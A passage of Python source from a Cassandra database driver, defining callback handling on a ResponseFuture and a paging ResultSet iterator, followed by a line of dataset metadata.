self._callbacks.append((fn, args, kwargs))
if run_now:
fn(self._final_result, *args, **kwargs)
return self
def add_errback(self, fn, *args, **kwargs):
"""
Like :meth:`.add_callback()`, but handles error cases.
An Exception instance will be passed as the first positional argument
to `fn`.
"""
run_now = False
with self._callback_lock:
if self._final_exception:
run_now = True
else:
self._errbacks.append((fn, args, kwargs))
if run_now:
fn(self._final_exception, *args, **kwargs)
return self
def add_callbacks(self, callback, errback,
callback_args=(), callback_kwargs=None,
errback_args=(), errback_kwargs=None):
"""
A convenient combination of :meth:`.add_callback()` and
:meth:`.add_errback()`.
Example usage::
>>> session = cluster.connect()
>>> query = "SELECT * FROM mycf"
>>> future = session.execute_async(query)
>>> def log_results(results, level='debug'):
... for row in results:
... log.log(level, "Result: %s", row)
>>> def log_error(exc, query):
... log.error("Query '%s' failed: %s", query, exc)
>>> future.add_callbacks(
... callback=log_results, callback_kwargs={'level': 'info'},
... errback=log_error, errback_args=(query,))
"""
self.add_callback(callback, *callback_args, **(callback_kwargs or {}))
self.add_errback(errback, *errback_args, **(errback_kwargs or {}))
def clear_callbacks(self):
with self._callback_lock:
self._callback = []
self._errback = []
def __str__(self):
result = "(no result yet)" if self._final_result is _NOT_SET else self._final_result
return "<ResponseFuture: query='%s' request_id=%s result=%s exception=%s host=%s>" \
% (self.query, self._req_id, result, self._final_exception, self._current_host)
__repr__ = __str__
class QueryExhausted(Exception):
"""
Raised when :meth:`.ResponseFuture.start_fetching_next_page()` is called and
there are no more pages. You can check :attr:`.ResponseFuture.has_more_pages`
before calling to avoid this.
.. versionadded:: 2.0.0
"""
pass
class ResultSet(object):
"""
An iterator over the rows from a query result. Also supplies basic equality
and indexing methods for backward-compatability. These methods materialize
the entire result set (loading all pages), and should only be used if the
total result size is understood. Warnings are emitted when paged results
are materialized in this fashion.
You can treat this as a normal iterator over rows::
>>> from cassandra.query import SimpleStatement
>>> statement = SimpleStatement("SELECT * FROM users", fetch_size=10)
>>> for user_row in session.execute(statement):
... process_user(user_row)
Whenever there are no more rows in the current page, the next page will
be fetched transparently. However, note that it *is* possible for
an :class:`Exception` to be raised while fetching the next page, just
like you might see on a normal call to ``session.execute()``.
"""
def __init__(self, response_future, initial_response):
self.response_future = response_future
self.column_names = response_future._col_names
self._set_current_rows(initial_response)
self._page_iter = None
self._list_mode = False
@property
def has_more_pages(self):
"""
True if the last response indicated more pages; False otherwise
"""
return self.response_future.has_more_pages
@property
def current_rows(self):
"""
The list of current page rows. May be empty if the result was empty,
or this is the last page.
"""
return self._current_rows or []
def __iter__(self):
if self._list_mode:
return iter(self._current_rows)
self._page_iter = iter(self._current_rows)
return self
def next(self):
try:
return next(self._page_iter)
except StopIteration:
if not self.response_future.has_more_pages:
if not self._list_mode:
self._current_rows = []
raise
self.fetch_next_page()
self._page_iter = iter(self._current_rows)
return next(self._page_iter)
__next__ = next
def fetch_next_page(self):
"""
Manually, synchronously fetch the next page. Supplied for manually retrieving pages
and inspecting :meth:`~.current_page`. It is not necessary to call this when iterating
through results; paging happens implicitly in iteration.
"""
if self.response_future.has_more_pages:
self.response_future.start_fetching_next_page()
result = self.response_future.result()
self._current_rows = result._current_rows # ResultSet has already _set_current_rows to the appropriate form
else:
self._current_rows = []
def _set_current_rows(self, result):
if isinstance(result, Mapping):
self._current_rows = [result] if result else []
return
try:
iter(result) # can't check directly for generator types because cython generators are different
self._current_rows = result
except TypeError:
self._current_rows = [result] if result else []
def _fetch_all(self):
self._current_rows = list(self)
self._page_iter = None
def _enter_list_mode(self, operator):
if self._list_mode:
return
if self._page_iter:
raise RuntimeError("Cannot use %s when results have been iterated." % operator)
if self.response_future.has_more_pages:
log.warning("Using %s on paged results causes entire result set to be materialized.", operator)
self._fetch_all() # done regardless of paging status in case the row factory produces a generator
self._list_mode = True
def __eq__(self, other):
self._enter_list_mode("equality operator")
return self._current_rows == other
def __getitem__(self, i):
self._enter_list_mode("index operator")
return self._current_rows[i]
def __nonzero__(self):
return bool(self._current_rows)
__bool__ = __nonzero__
def get_query_trace(self, max_wait_sec=None):
"""
Gets the last query trace from the associated future.
See :meth:`.ResponseFuture.get_query_trace` for details.
"""
return self.response_future.get_query_trace(max_wait_sec)
def get_all_query_traces(self, max_wait_sec_per=None):
"""
Gets all query traces from the associated future.
See :meth:`.ResponseFuture.get_all_query_traces` for details.
"""
return self.response_future.get_all_query_traces(max_wait_sec_per)
@property
def was_applied(self):
"""
For LWT results, returns whether the transaction was applied.
Result is indeterminate if called on a result that was not an LWT request.
Only valid when one of tne of the internal row factories is in use.
"""
if self.response_future.row_factory not in (named_tuple_factory, dict_factory, tuple_factory):
raise RuntimeError("Cannot determine LWT result with row factory %s" % (self.response_future.row_factsory,))
if len(self.current_rows) != 1:
raise RuntimeError("LWT result should have exactly one row. This has %d." % (len(self.current_rows)))
row = self.current_rows[0]
if isinstance(row, tuple):
return row[0]
else:
return row['[applied]']
| apache-2.0 | -163,086,977,530,493,200 | 39.937397 | 187 | 0.613633 | false |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.